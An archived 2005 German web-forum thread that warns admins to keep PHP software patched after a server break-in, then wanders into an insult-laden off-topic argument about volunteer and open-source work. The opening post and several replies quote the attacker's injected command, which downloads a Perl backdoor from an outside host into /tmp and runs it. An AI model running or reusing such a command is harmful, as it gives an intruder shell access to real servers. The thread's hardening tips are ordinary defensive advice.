tag:forum.selfhtml.org,2005:/self Haltet eure PHP-Software aktuell! – SELFHTML-Forum 2005-06-16T21:00:13Z https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821281#m821281 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T07:02:22Z 2005-06-10T07:02:22Z Haltet eure PHP-Software aktuell! <p>你们好,</p> <p>nur eine Warnung: haltet eure PHP-Software aktuell! Potentielle Löcher<br> bilden phpBB, phpNuke und ähnliche Ranz-Software! Wenn ihr selber Programme<br> schreibt, die exec(), system(), include() oder ähnliches benutzen: validiert<br> die Eingabe vernünftig!</p> <p>Hintergrund der Sache: es hat jemand geschafft, auf bastet.occuris.de Code<br> über eine solche Software einzuschleusen:</p> <p>system("uname -a");<br> system("cd /tmp;wget http://http://geocities.yahoo.com.br/netbrdial/bd.pl;cd /tmp;perl bd.pl");</p> <p>Fragt mich nicht, über welche Sicherheitslücke er das geschafft hat, das<br> habe ich noch nicht entdeckt. Wichtig ist nur der Code von bd.pl -- das ist<br> ein (recht gut gemachter) telnet-artiger Daemon, mit dem der Angreifer<br> Shell-Zugriff bekommt. Glücklicherweise ist das System halbwegs<br> abgesichert, deshalb hat der Angreifer keine weiterführenden Rechte<br> bekommen. Am besten ist es, derartige Software gar nicht erst einzusetzen!<br> Und wenn ihr sie einsetzt, deaktiviert per php.ini (disable_functions)<br> mindestens die Funktionen system, exec, shell_exec, proc_open!</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin orientierungslos!"<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821338#m821338 Senti 2005-06-10T07:51:10Z 2005-06-10T07:51:10Z Haltet eure PHP-Software aktuell! <p>Hi,<br> ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.</p> <p>MfG</p> <div class="signature">-- <br> ie:{ fl:( br:^ va:) ls:[ fo:| rl:? n4:( ss:) de:] js:( ch:? sh:) mo:| zu:) </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821284#m821284 Andreas Korthaus andreas.korthaus@selfhtml.org 2005-06-10T08:06:13Z 2005-06-10T08:06:13Z Haltet eure PHP-Software aktuell! <p>Hallo!</p> <blockquote> <p>Hintergrund der Sache: es hat jemand geschafft, auf bastet.occuris.de Code<br> über eine solche Software einzuschleusen:</p> <p>system("uname -a");<br> system("cd /tmp;wget http://http://geocities.yahoo.com.br/netbrdial/bd.pl;cd /tmp;perl bd.pl");</p> <p>Fragt mich nicht, über welche Sicherheitslücke er das geschafft hat,</p> </blockquote> <p>Hast Du mal die Apache-Logs durchsucht?</p> <p>grep wget /var/log/apache/*</p> <p>(zufällig awstat öffentlich zugänglich installiert?)</p> <p>Grüße<br> Andreas</p> <div class="signature">-- <br> SELFHTML Tipps & Tricks: <a href="http://aktuell.de.selfhtml.org/tippstricks/" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/tippstricks/</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821283#m821283 dedlfix 2005-06-10T13:01:23Z 2005-06-10T13:01:23Z Haltet eure PHP-Software aktuell! <p>echo $begrüßung;</p> <blockquote> <p>nur eine Warnung: haltet eure PHP-Software aktuell!</p> </blockquote> <p>Das klingt zunächst vernünftig.</p> <blockquote> <p>Hintergrund der Sache: es hat jemand geschafft, auf bastet.occuris.de Code<br> über eine solche Software einzuschleusen:</p> </blockquote> <p>Doch wie du nun selber erfahren durftest werden die meisten erst durch eigenen Schaden klug.</p> <ul> <li>Das System läuft doch.</li> <li>Ich hatte noch nie damit Probleme.</li> </ul> <p>Diese und ähnliche Vorurteile und Bequemlichkeiten legt manchereiner erst ab, nachdem er das Kind im Brunnen liegen sah. Oder auch dann nicht. Man kann das Kind ja auch wieder rausholen, sagt ihm ein paar tröstende Wort und weiter rennts. Und dass das Hoftor sperrangelweit offen steht ist momentan auch grad aus dem Bewusstsein verdrängt...</p> <p>Deine Warnung ist berechtigt, nur wird sie - mal abgesehen vom eingeschränkten Leserkreis hier - viele nur peripher tangieren. Leider.</p> <p>echo "$verabschiedung $name";</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821282#m821282 Manuel B. m.burghammer@xitara.net http://www.xitara.net 2005-06-11T14:05:04Z 2005-06-11T14:05:04Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <p>system("uname -a");<br> system("cd /tmp;wget http://http://geocities.yahoo.com.br/netbrdial/bd.pl;cd /tmp;perl bd.pl");</p> </blockquote> <p>Sowas war mit der vorletzen Version von AWStats möglich. Also wenn du ads drauf hast, in jedem Fall updaten.</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821285#m821285 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T08:08:31Z 2005-06-10T08:08:31Z Haltet eure PHP-Software aktuell! <p>你好 Andreas,</p> <blockquote> <p>Hast Du mal die Apache-Logs durchsucht?</p> </blockquote> <p>Natürlich.</p> <blockquote> <p>grep wget /var/log/apache/*</p> </blockquote> <p>Das bringt nichts. So blöd sind die Jungs ja nun nicht. Da wird mit chr() und<br> ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen<br> gefunden.</p> <blockquote> <p>(zufällig awstat öffentlich zugänglich installiert?)</p> </blockquote> <p>Nö.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> So, wie ein Teil ist, ist das Ganze.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821333#m821333 Klaus 2005-06-10T08:12:59Z 2005-06-10T08:12:59Z Haltet eure PHP-Software aktuell! <p>Hallo,</p> <blockquote> <p>Das bringt nichts. So blöd sind die Jungs ja nun nicht. Da wird mit chr() und<br> ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen<br> gefunden.</p> </blockquote> <p>Mich wurde mal interesieren was dann mit dem passiert. Machst du da nee Anzeige oder redest du mit dem nur?</p> <p>Gruß Klaus</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821328#m821328 Andreas Korthaus andreas.korthaus@selfhtml.org 2005-06-10T08:51:31Z 2005-06-10T08:51:31Z Haltet eure PHP-Software aktuell! <p>Hallo!</p> <blockquote> <blockquote> <p>Hast Du mal die Apache-Logs durchsucht?</p> </blockquote> <p>Natürlich.</p> </blockquote> <p>Dumme Frage im nachhinein ;-)</p> <blockquote> <blockquote> <p>grep wget /var/log/apache/*</p> </blockquote> <p>Das bringt nichts. So blöd sind die Jungs ja nun nicht.</p> </blockquote> <p>Oh doch, Deine vielleicht nicht, aber man liest es doch immer wieder...</p> <blockquote> <p>Da wird mit chr() und<br> ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen<br> gefunden.</p> </blockquote> <p>und wie wenn ich fragen darf? (wo hast Du wonach gesucht?)</p> <p>Viele Grüße<br> Andreas</p> <div class="signature">-- <br> SELFHTML Linkverzeichnis: <a href="http://aktuell.de.selfhtml.org/links/" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/links/</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821286#m821286 Ludger 2005-06-10T11:00:30Z 2005-06-10T11:00:30Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <p>Ich habe inzwischen aber den Schuldigen<br> gefunden.</p> </blockquote> <p>die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, sicherlich auch im os-Kontext. Eine Eigenschaft des rein ehrenamtlichen Tuns ist sicherlich u.a. die nur ungenuegend vorhandene Moeglichkeit konditionierend einzuwirken (und von wem auch und warum? ;-).</p> <p>Und nicht nur so etwas moechte ich "frickeln" nennen; gut gemeint, "doofes Brot" dazwischen, Konsequenzen ((das stoerungsverursachende Subjekt betreffend) oft unmoeglich) unabsehbar bzw. unrealisierbar.</p> <p>Dennoch, mir ist die Wikipedia bereits mehrfach positiv "aufgestossen", wie funktioniert denn sowas halbwegs zuverlaessig? Wird da die Geschwaetzigkeit bestimmter wertvoller Nutzer augenutzt oder ist der Erfolg etwa "systemimmanent"?</p> <p>Gruss,<br> Ludger</p> <div class="signature">-- <br> "Frickelt rugig weiter!" </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821300#m821300 Daniela Koller dako@wwwtech.de 2005-06-10T11:04:43Z 2005-06-10T11:04:43Z Haltet eure PHP-Software aktuell! <p>Hi Ludger</p> <blockquote> <p>die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, sicherlich auch im os-Kontext. Eine Eigenschaft des rein ehrenamtlichen Tuns ist sicherlich u.a. die nur ungenuegend vorhandene Moeglichkeit konditionierend einzuwirken (und von wem auch und warum? ;-).</p> </blockquote> <p>*prust* Ich finde das gerade sehr witzig. Was bitte hat occuris mit ehrenamtlicher Tätigkeit zu tun? Ich würde Nachlesen empfehlen, bevor du Allgemeinplätze erzählst.</p> <p>Gruss Daniela</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821299#m821299 Swen Wacker Swen.Wacker@gmx.de 2005-06-10T11:21:04Z 2005-06-10T11:21:04Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <p>Wird da die Geschwaetzigkeit bestimmter wertvoller Nutzer augenutzt oder ist der Erfolg etwa "systemimmanent"?</p> </blockquote> <p>Der Grund ist einfacher als Du denkst: Deine Vorurteile stimmen nicht.</p> <p>Viele Grüße</p> <p>Swen Wacker</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821287#m821287 Thomas J.S. thomas.js@selfhtml.org 2005-06-10T12:24:21Z 2005-06-10T12:24:21Z Haltet eure PHP-Software aktuell! <p>Mein lieber Ludger,</p> <blockquote> <p>die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, [...]</p> </blockquote> <p>Ich habe langsam aber sicher genug von dir und von deinen vollkommen kontextfremden und aus kaum was anderem, als ständigen Unterstellungen und Angriffen bestehenden Mitteilungen.</p> <p>Entweder du unterläßt diese hier, oder du suchst dir eine andere Plattform um deinen Mittelungsdrag zu befriedigen.</p> <p>Grüße<br> Thomas</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821298#m821298 Ludger 2005-06-10T15:20:55Z 2005-06-10T15:20:55Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, [...]</p> </blockquote> <p>Ich habe langsam aber sicher genug von dir</p> </blockquote> <p>die Suche nahc dem "Schuldigen" ist aber ein soziales Konzept und durchaus kritikwuerdig. Weil es in aller Regel nicht zielfuehrend ist z.B..</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821288#m821288 Andreas Lindig 2005-06-10T18:38:56Z 2005-06-10T18:38:56Z Haltet eure PHP-Software aktuell! <p>Hallo Thomas,</p> <blockquote> <p>Entweder du unterläßt diese hier, oder du suchst dir eine andere Plattform um deinen Mittelungsdrag zu befriedigen.</p> </blockquote> <p>Möglichkeit 3: wir führen die Wahl zum Spinner des Monats ein ;-)</p> <p>Gruß, Andreas</p> <div class="signature">-- <br> SELFFORUM - hier werden Sie geholfen,<br> auch in Fragen zu richtiges Deutsch </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821289#m821289 Ludger 2005-06-10T18:40:41Z 2005-06-10T18:40:41Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>Entweder du unterläßt diese hier, oder du suchst dir eine andere Plattform um deinen Mittelungsdrag zu befriedigen.</p> </blockquote> <p>Möglichkeit 3: wir führen die Wahl zum Spinner des Monats ein ;-)</p> </blockquote> <p>ich stehe zur Verfuegung.</p> <p>Lohnt sich das denn dann auch fuer mich?</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821290#m821290 Siramon selfhtml@hotmail.com http://novasign.ch 2005-06-14T15:12:39Z 2005-06-14T15:12:39Z Haltet eure PHP-Software aktuell! <p>Hallo Lude,</p> <blockquote> <blockquote> <p>Möglichkeit 3: wir führen die Wahl zum Spinner des Monats ein ;-)<br> Lohnt sich das denn dann auch fuer mich?</p> </blockquote> </blockquote> <p>hmm, habe ich jetzt falsch verstanden oder arbeitest du nicht genau auf diesen titel hin? die wahl deiner person zum spinner des monats wäre dann quasi die früchte deiner langjährigen arbeit. gut, nicht? danach brauchen wir noch 3 weiter postings von dir und du stehst dann zur wahl des "spinner des jahres" (spinner des monats werden automatisch nominiert). die wahl findet am darauffolgenden tag statt. bei einer promotion deinerseits darfst du dann gehen, weil ziel erreicht. gut, nicht?</p> <p>Grüsse<br> Siramon,<br>      ja der spinner aus der schweiz</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821291#m821291 Ludger 2005-06-14T17:05:09Z 2005-06-14T17:05:09Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <p>hmm, habe ich jetzt falsch verstanden oder arbeitest du nicht genau auf diesen titel hin? die wahl deiner person zum spinner des monats wäre dann quasi die früchte deiner langjährigen arbeit. gut, nicht?</p> </blockquote> <p>so magst Du das sehen, ich dagegen sehe in Dir den unverbesserlichen Dumpf. Schreib doch mal, was Du von IT verstehst. Nichts?</p> <blockquote> <p>die wahl findet am darauffolgenden tag statt. bei einer promotion deinerseits darfst du dann gehen, weil ziel erreicht. gut, nicht?</p> </blockquote> <p>Ich gehe mal rein spekulativ davon aus - aber meine reichhaltige Erfahrung mit Querkoepfen hier qualifiziert mich zu Aussagen wie diese - dass Du ein moeglicherweise erfolgreicher Absolvent eines geisteswissenschaftlichen Studiengangs bist, gut! Aber ansonsten solltest Du Dich hier ein wenig zurueckhalten, wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821297#m821297 Anonymous 2005-06-14T17:38:32Z 2005-06-14T17:38:32Z Haltet eure PHP-Software aktuell! <blockquote> <p>wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.</p> </blockquote> <p>Wenn es danach ginge dürftes du gar nichts dagen. Aus beiden Gründen.</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821292#m821292 Siramon selfhtml@hotmail.com http://novasign.ch 2005-06-15T21:34:18Z 2005-06-15T21:34:18Z Haltet eure PHP-Software aktuell! <p>Hallo Lude,</p> <blockquote> <p>so magst Du das sehen, ich dagegen sehe in Dir den unverbesserlichen Dumpf. Schreib doch mal, was Du von IT verstehst. Nichts?</p> </blockquote> <p>nein.<br> oder vielleich doch...<br> ich würde mich als script-kiddie bezeichnen. übrigens, den begriff script-kiddie werte ich ähnlich wie du den ausdruck frickelsoftware - ich finde ihn quasi nur lustig.</p> <blockquote> <p>Ich gehe mal rein spekulativ davon aus - aber meine reichhaltige Erfahrung mit Querkoepfen hier qualifiziert mich zu Aussagen wie diese - dass Du ein moeglicherweise erfolgreicher Absolvent eines geisteswissenschaftlichen Studiengangs bist, gut! Aber ansonsten solltest Du Dich hier ein wenig zurueckhalten, wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.</p> </blockquote> <p>geisteswissenschaften, ja auch. erfolgreicher abschluss, wir werden sehen.</p> <p>Grüsse<br> Siramon,<br>      ja der studi aus zürich</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821293#m821293 Ludger 2005-06-16T10:20:57Z 2005-06-16T10:20:57Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>Aber ansonsten solltest Du Dich hier ein wenig zurueckhalten, wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.<br> geisteswissenschaften, ja auch. erfolgreicher abschluss, wir werden sehen.</p> </blockquote> </blockquote> <p>tja, dann wirst Du bestimmt Lehrer!?   :-(</p> <p>Gruss,<br> Ludger</p> <div class="signature">-- <br> "Studi-Gedoens" </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821294#m821294 Siramon selfhtml@hotmail.com http://novasign.ch 2005-06-16T13:37:19Z 2005-06-16T13:37:19Z Haltet eure PHP-Software aktuell! <p>Hallo Lude,</p> <blockquote> <blockquote> <blockquote> <p>Aber ansonsten solltest Du Dich hier ein wenig zurueckhalten, wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.<br> geisteswissenschaften, ja auch. erfolgreicher abschluss, wir werden sehen.</p> </blockquote> </blockquote> </blockquote> <p>erstens... lustiger quote (fehlt da nicht was dazwischen?)</p> <blockquote> <p>tja, dann wirst Du bestimmt Lehrer!?   :-(</p> </blockquote> <p>zweitens... eher nein, wenn, dann professor. oder kennst du lehrer, die sozial-geographische themen behandeln. und zweitens aatens, wie kommst du zu diesem schluss?</p> <p>drittens... liegen mir die sozial-geographischen themen eher nicht. sie knabern sogar am _erfolgreichen_ abschluss meines studiums.</p> <p>viertens... falls du nichts verstanden hast, liegt das wohl an meiner sozialen inkompetenz. und viertens aatens, wie bist du eigentlich zu diesem schluss gekommen?</p> <blockquote> <p>"Studi-Gedoens"</p> </blockquote> <p>und fünftens... hat gedoens was mit frickeln zu tun? frickelaussage?</p> <p>Grüsse<br> Siramon,<br>      ja heute doensend</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821295#m821295 Ludger 2005-06-16T16:37:30Z 2005-06-16T16:37:30Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>tja, dann wirst Du bestimmt Lehrer!?   :-(<br> zweitens... eher nein, wenn, dann professor. oder kennst du lehrer, die sozial-geographische themen behandeln. und zweitens aatens, wie kommst du zu diesem schluss?</p> </blockquote> </blockquote> <p>ich hatte das 'sozial' schon als vermuteten Kompetenzschwerpunkt herausgelesen aus Deinen Postings.</p> <p>BTW - was sind denn "sozial-geographische Themen"? Ist das was fuer Gruene und andere Esoteriker?</p> <p>Gruss,<br> Ludger</p> <div class="signature">-- <br> <a href="http://www.google.de/search?hl=de&q=%22sozial-geographische+Themen%22&btnG=Suche&meta=" rel="nofollow noopener noreferrer">http://www.google.de/search?hl=de&q="sozial-geographische+Themen"&btnG=Suche&meta=</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821296#m821296 Siramon selfhtml@hotmail.com http://novasign.ch 2005-06-16T17:22:02Z 2005-06-16T17:22:02Z Haltet eure PHP-Software aktuell! <p>Hallo Lude,</p> <blockquote> <p>ich hatte das 'sozial' schon als vermuteten Kompetenzschwerpunkt herausgelesen aus Deinen Postings.</p> </blockquote> <p>war nicht mein schwerpunkt, wurde aber einer. wobei bei meiner postingfrequenz lassen sich doch nicht wirklich schwerpunkte herauslesen? naja.</p> <blockquote> <p>BTW - was sind denn "sozial-geographische Themen"? [Frickelvorschläge]<br> [Frickelsuche in der Signatur]</p> </blockquote> <p><a href="http://de.wikipedia.org/wiki/Sozialgeografie" rel="nofollow noopener noreferrer">sozialgeographie</a>, im speziellen viele themen aus der <a href="http://de.wikipedia.org/wiki/Kategorie:Humangeographie" rel="nofollow noopener noreferrer">humangeographie</a></p> <p>Grüsse<br> Siramon,<br>      ja heute mal sozialkiddie</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821301#m821301 Ludger 2005-06-10T11:13:03Z 2005-06-10T11:13:03Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, sicherlich auch im os-Kontext. Eine Eigenschaft des rein ehrenamtlichen Tuns ist sicherlich u.a. die nur ungenuegend vorhandene Moeglichkeit konditionierend einzuwirken (und von wem auch und warum? ;-).</p> </blockquote> <p>*prust* Ich finde das gerade sehr witzig. Was bitte hat occuris mit ehrenamtlicher Tätigkeit zu tun? Ich würde Nachlesen empfehlen, bevor du Allgemeinplätze erzählst.</p> </blockquote> <p>das sollte auch witzig sein.   :-)</p> <p>Ich kenne die Bearbeitungsweisen fachlicher Probleme hinreichend aus dem ehrenamtlichen "sozialen" Kontext und stelle da in aller Regel Sozialverhalten "niederer Kasten" (Mobbing, Antipathien, Irrationalitaet, fehlende hierarchische Strukturen und die Unmoeglichkeit "den Richtigen" entscheiden zu lassen fest) bzw. im geschaeftlichen Umfeld tendentiell zielfuehrendes, aber zugegebenermassen auch nicht "hochintelligentes" Sozial- und Entscheidungverhalten fest.</p> <p>Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird. Ists frickeln oder ist da mehr? Und warum scheint die Wikipedia zu funktionieren?</p> <p>Gruss,<br> Ludger</p> <div class="signature">-- <br> "Nach der naechsten bundesdeutschen Wahl gibt es ein Problem weniger." </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821325#m821325 Daniela Koller dako@wwwtech.de 2005-06-10T11:16:10Z 2005-06-10T11:16:10Z Haltet eure PHP-Software aktuell! <p>Hi Ludger</p> <p>Du hast _nichts_ verstanden. Occuris ist eine Firma, sie hat _nichts_ mit ehrenamtlicher Tätigkeit zu tun.</p> <p>Gruss Daniela</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821322#m821322 molily molily@gmx.de 2005-06-10T11:35:56Z 2005-06-10T11:35:56Z Haltet eure PHP-Software aktuell! <p>Hallo,</p> <blockquote> <p>Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird. Ists frickeln oder ist da mehr? Und warum scheint die Wikipedia zu funktionieren?</p> </blockquote> <p>Wenn man glaubt, die Wikipedia würde funktionieren, hat man höchstwahrscheinlich einfach nicht genau hingeschaut. Äußerlichen Schein produziert vor allem die technisch-formale Ordnung. Es wird unendlich viel Engagement investiert, das Formale zu wahren und durchzusetzen. Schaut man unter diese vermeintlich wohlgeordnete Oberfläche, findet man eben vornehmlich Irrationalität und für vernünftige Arbeit unergiebige Strukturen.</p> <p>Mathias</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821302#m821302 Orlando http://skop.net/ 2005-06-11T16:29:00Z 2005-06-11T16:29:00Z Haltet eure PHP-Software aktuell! <p>Hallo Ludger,</p> <blockquote> <p>Ich kenne die Bearbeitungsweisen fachlicher Probleme hinreichend aus dem ehrenamtlichen "sozialen" Kontext</p> </blockquote> <p>Tatsächlich? In welcher Form?</p> <blockquote> <p>und stelle da in aller Regel Sozialverhalten "niederer Kasten" (Mobbing, Antipathien, Irrationalitaet,</p> </blockquote> <p>Interessant, bring doch bitte Beispiele.</p> <blockquote> <p>fehlende hierarchische Strukturen</p> </blockquote> <p>Fehlen sie tatsächlich? Oder nur dir? Die Devs beispielsweise arbeiten in uneingeschränkter Anarchie.</p> <blockquote> <p>und die Unmoeglichkeit "den Richtigen" entscheiden zu lassen fest)</p> </blockquote> <p>Wer etwas umsetzt, hat Recht.</p> <blockquote> <p>Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird.</p> </blockquote> <p>Eigenverantwortlich.</p> <blockquote> <p>Ists frickeln oder ist da mehr?</p> </blockquote> <p>Keine Ahnung, was soll „frickeln“ aussagen?</p> <p>Grüße<br> Roland</p> <div class="signature">-- <br> <a href="http://aktuell.de.selfhtml.org/tippstricks/css/drucklayout/" rel="nofollow noopener noreferrer">CSS für ein Druck-Layout</a><br> <a href="http://www.schweikhardt.net/wider-die-sinnmacher.html" rel="nofollow noopener noreferrer">Traktat wider die Sinnmacher</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821303#m821303 Ludger 2005-06-11T18:13:28Z 2005-06-11T18:13:28Z Haltet eure PHP-Software aktuell! <p>Hi,</p> <blockquote> <blockquote> <p>Ich kenne die Bearbeitungsweisen fachlicher Probleme hinreichend aus dem ehrenamtlichen "sozialen" Kontext</p> </blockquote> <p>Tatsächlich? In welcher Form?</p> </blockquote> <p>Du warst doch vielleicht auch schon mal in einem Verein? Da passieren doch Sachen, die sind irrational. Und warum sollte man da nicht verallgemeinern?</p> <blockquote> <blockquote> <p>und stelle da in aller Regel Sozialverhalten "niederer Kasten" (Mobbing, Antipathien, Irrationalitaet,</p> </blockquote> <p>Interessant, bring doch bitte Beispiele.</p> </blockquote> <p>Ich hatte kuerzlich Kontakt mit einem von der oesterreichischen osCommerce community. Der wollte eine bestimmte Funktionalitaet, die ich als XML-basierten webservice bereitgestellt habe als osCommerce contribution veroeffentlichen. Nur - man lausche - den Mann schien es nicht sonderlich zu interessieren, ob das, was er entwickelt auch laeuft und natuerlich war seine "Verpackung" sehr buggy. Das war irrational.<br> Dann gibt es so open source Sachen wie bspw. SOAP::Lite, das bei groesseren und komplexen XML Dokumenten bei der Ausgabe datenverlustig wird. Ist moeglicherweise ein Ein-Mann Projekt.<br> Mobbing und Antipathien moechte ich nicht belegen, beides ist aber typisch im ehrenamtlichen Bereich. (BTW - ich fuehle mich hier relativ oft unnoetig unfreundlich angegangen, oft von dem- oder denselben.)</p> <blockquote> <blockquote> <p>fehlende hierarchische Strukturen</p> </blockquote> <p>Fehlen sie tatsächlich? Oder nur dir? Die Devs beispielsweise arbeiten in uneingeschränkter Anarchie.</p> </blockquote> <p>Aber es gibt _den_ Chefentwickler. Ausserdem gibt es eine, ich sage mal politisch (im uebrtragenden Sinn) aehnliche Ausrichtung, die die Leute zusammenhalten laesst.<br> Ich bin davon ueberzeugt, dass Hierarchien absolut erforderlich sind. BTW - die Devs sind doch auch hierarchisch aufgestellt, es gibt doch eine Aufgabenverteilung mit Schwerpunkten (Das ist auch eine Hierarchie, aber wenns hart auf hart kommt, fehlt der Entscheider.). Aber, um Missverstaendnissen vorzubeugen, ich habe und hatte nicht vor die Devs zu kritisieren, mir ging es um open source und community im Vergleich zur Wirtschaft (auch da wird gefrickelt, aber die Organisationsform produziert bessere Ergebnisse.)</p> <blockquote> <blockquote> <p>und die Unmoeglichkeit "den Richtigen" entscheiden zu lassen fest)</p> </blockquote> <p>Wer etwas umsetzt, hat Recht.</p> </blockquote> <p>Wer erfolgreich umsetzt scheint recht zu haben. Ich weiss aber nicht genau, ob das stimmt. Es ist naemlich nicht nur wichtig, dass es "funzt", sondern dass das bereitgestellte System auch weiterentwicklungsfaehig, wartungsfreundlich und skalierbar ist.</p> <blockquote> <blockquote> <p>Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird.</p> </blockquote> <p>Eigenverantwortlich.</p> </blockquote> <p>;-)</p> <blockquote> <blockquote> <p>Ists frickeln oder ist da mehr?</p> </blockquote> <p>Keine Ahnung, was soll „frickeln“ aussagen?</p> </blockquote> <p>Ich weiss auch nicht was frickeln ist. Ich habe das Wort aufgegriffen, weil es lustig ist und anschienend hier tabuisiert. Was ich persoenlich mit frickeln meine ist das Zusammenfriemeln (Kodieren) bestimmter nicht so relevanter Funktionalitaeten, also bspw. von UIs. Aber da kann man anderer Meinung sein, kein Problem.   :-)</p> <p>Gruss,<br> Ludger</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821321#m821321 Orlando http://skop.net/ 2005-06-12T15:45:35Z 2005-06-12T15:45:35Z Ehrenamtliche Arbeit - Open Source und Selbstorganisation <p>Hallo Ludger,</p> <blockquote> <p>Du warst doch vielleicht auch schon mal in einem Verein?</p> </blockquote> <p><a href="http://verein.de.selfhtml.org/mitglieder/regulaere.htm#liste" rel="nofollow noopener noreferrer">Ja</a>.</p> <blockquote> <p>Da passieren doch Sachen, die sind irrational.</p> </blockquote> <p>Hm, mir fällt leider kein Beispiel ein, das ich hier nennen möchte. ;-)</p> <p>Natürlich „menschelt“ es auch in einem Verein, so wie eben in jeder zwischenmenschlichen Beziehung. Diesen Umstand begründen jedoch weder die Rechtsform noch die Ausrichtung.</p> <blockquote> <p>Und warum sollte man da nicht verallgemeinern?</p> </blockquote> <p>Weil das eine verkürzte Sichtweise impliziert? Verallgemeinerungen sind bequem, aber oberflächlich. Und das wollen wir schließlich nicht sein.</p> <blockquote> <blockquote> <blockquote> <p>Mobbing, Antipathien, Irrationalitaet,</p> </blockquote> </blockquote> <p>Ich hatte kuerzlich Kontakt mit einem von der oesterreichischen osCommerce community. Der wollte eine bestimmte Funktionalitaet, die ich als XML-basierten webservice bereitgestellt habe als osCommerce contribution veroeffentlichen.</p> </blockquote> <p>Das war natürlich bereits ein Fehler. ;-)</p> <blockquote> <p>Nur - man lausche - den Mann schien es nicht sonderlich zu interessieren, ob das, was er entwickelt auch laeuft und natuerlich war seine "Verpackung" sehr buggy. Das war irrational.</p> </blockquote> <p>Warum war das irrational? Womöglich war ihm das Ergebnis egal, weil er innerlich bereits gekündigt hatte, ihn das Thema nicht interessierte, usw. usf. Was stand darüber im Vertrag (Pflichten- bzw. Lastenheft) und was hat dieses bemitleidenswerte Einzelschicksal mit OS zu tun?</p> <blockquote> <p>Dann gibt es so open source Sachen wie bspw. SOAP::Lite, das bei groesseren und komplexen XML Dokumenten bei der Ausgabe datenverlustig wird. Ist moeglicherweise ein Ein-Mann Projekt.</p> </blockquote> 